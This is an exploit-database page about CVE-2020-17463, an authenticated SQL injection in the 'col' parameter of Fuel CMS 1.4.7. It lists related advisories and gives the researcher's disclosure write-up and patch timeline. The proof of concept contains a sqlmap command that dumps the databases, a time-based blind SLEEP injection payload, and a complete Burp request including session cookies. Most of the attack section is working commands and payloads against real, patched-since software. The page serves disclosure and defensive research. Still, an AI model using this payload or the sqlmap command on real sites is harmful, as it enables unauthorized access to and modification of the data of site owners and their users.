Fuel CMS 1.4.7 - (col) SQL Injection (Authenticated) Vulnerability

🗓️ 10 Aug 2020 00:00:00Reported by ROEL VAN BEURDENType

zdt🔗 0day.today👁 209 Views

Fuel CMS 1.4.7 SQL Injection (Authenticated) Vulnerabilit

Reporter	Title	Published	Views	Family All 20
ATTACKERKB	CVE-2020-17463	13 Aug 202000:00	–	attackerkb
BDU FSTEC	The vulnerability of the FUEL CMS content management system lies in the lack of protection for SQL query structures, which allows attackers to compromise the confidentiality, integrity, and accessibility of the protected information.	25 Jul 202200:00	–	bdu_fstec
Circl	CVE-2020-17463	14 Jun 202321:10	–	circl
CISA KEV Catalog	Fuel CMS SQL Injection Vulnerability	10 Dec 202100:00	–	cisa_kev
CISA	CISA Adds Thirteen Known Exploited Vulnerabilities to Catalog	10 Dec 202100:00	–	cisa
CISA	CISA Adds 13 Known Exploited Vulnerabilities to Catalog	10 Dec 202100:00	–	cisa
Check Point Advisories	SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465)	18 Nov 202000:00	–	checkpoint_advisories
CVE	CVE-2020-17463	13 Aug 202012:28	–	cve
Cvelist	CVE-2020-17463	13 Aug 202012:28	–	cvelist
Exploit DB	Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)	11 Aug 202000:00	–	exploitdb

# Exploit Title: Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.7.zip
# Version: 1.4.7
# Tested on: Linux Ubuntu 18.04
# CVE: CVE-2020-17463


1. Description:
----------------------

Fuel CMS 1.4.7 allows SQL Injection via parameter 'col' in pages/items, permissions/items, navigation/items and logs/items
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


2. Proof of Concept:
----------------------

In Burpsuite intercept the request from one of the affected pages with 'col' parameter and save it like fuel.req
Then run SQLmap to extract the data from the database:

sqlmap -r fuel.req --risk=3 --level=5 --dbs --random-agent


3. Example payload:
----------------------

(time-based blind)

/fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0


4. Burpsuite request:
----------------------

GET /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location%20AND%20(SELECT%201340%20FROM%20(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 HTTP/1.1

Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Cookie: ci_session=2pvc8gmus9he9fbesp3lkhlbc7oal188; fuel_eeed351bf4de904070ff77c1aef15576=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_eeed351bf4de904070ff77c1aef15576=%2528%257Bleftnav_h3%253A%25220%257C0%257C0%257C0%2522%252C%2520fuel_permissions_items%253A%2522list%2522%252C%2520fuel_pages_items%253A%2522list%2522%252C%2520leftnav_hide%253A%25220%2522%252C%2520tabs_ms_assets_create%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a63773d3d%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a637939305a584e30%253A%25220%2522%252C%2520tabs_ms_assets_create_615731685a32567a%253A%25220%2522%252C%2520fuel_navigation_items%253A%2522list%2522%257D%2529

Upgrade-Insecure-Requests: 1


5. Timeline:
----------------------

2020-08-01: SQLi vulnerability found in Fuel CMS 1.4.7
2020-08-02: Reported vulnerability to vendor
2020-08-11: Vendor has patched the SQLi vulnerability in version 1.4.8

#  0day.today [2020-08-12]  #

10 Aug 2020 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.17515